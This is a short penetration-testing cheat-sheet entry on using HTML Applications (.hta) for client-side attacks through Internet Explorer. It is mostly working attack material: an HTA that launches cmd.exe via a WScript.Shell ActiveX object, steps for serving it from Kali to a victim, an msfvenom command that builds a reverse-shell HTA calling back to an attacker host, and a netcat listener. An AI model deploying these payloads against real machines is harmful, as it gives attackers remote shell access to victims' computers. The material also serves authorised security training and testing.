HTML Applications (HTA)

HTML Applications (.hta) can be used for client-side attacks. They can contain JavaScript or VBScript code. Files are executed directly within Internet Explorer rather than downloaded before manual execution. Compatible with ActiveX. Also works with Microsoft Edge, but applications are downloaded and then run.

• Introduction to HTML Applications (HTAs)
• What is Internet Explorer (IE) mode?

Examples

Open a command prompt (JavaScript)

• Save in /var/www/html/file.hta
• Start Kali’s Apache Web Server
• From victim, open Internet Explorer and go to http://KALI_IP/file.hta
• When asked what to do with the file, click Open.

<html>
<body>
<script>
    var myprecious = 'cmd.exe'
    new ActiveXObject('WScript.Shell').Run(myprecious);
</script>
</body>
<script>
    self.close();
</script>
</html>

Generate payloads with msfvenom

Windows reverse shell, HTA + Powershell

KALI_IP=x.x.x.x
LISTENER_PORT=443
sudo msfvenom -p windows/shell_reverse_tcp LHOST=${KALI_IP} LPORT=${LISTENER_PORT} -f hta-psh -o /var/www/html/poc_hta.hta

sudo nc -nlvp 443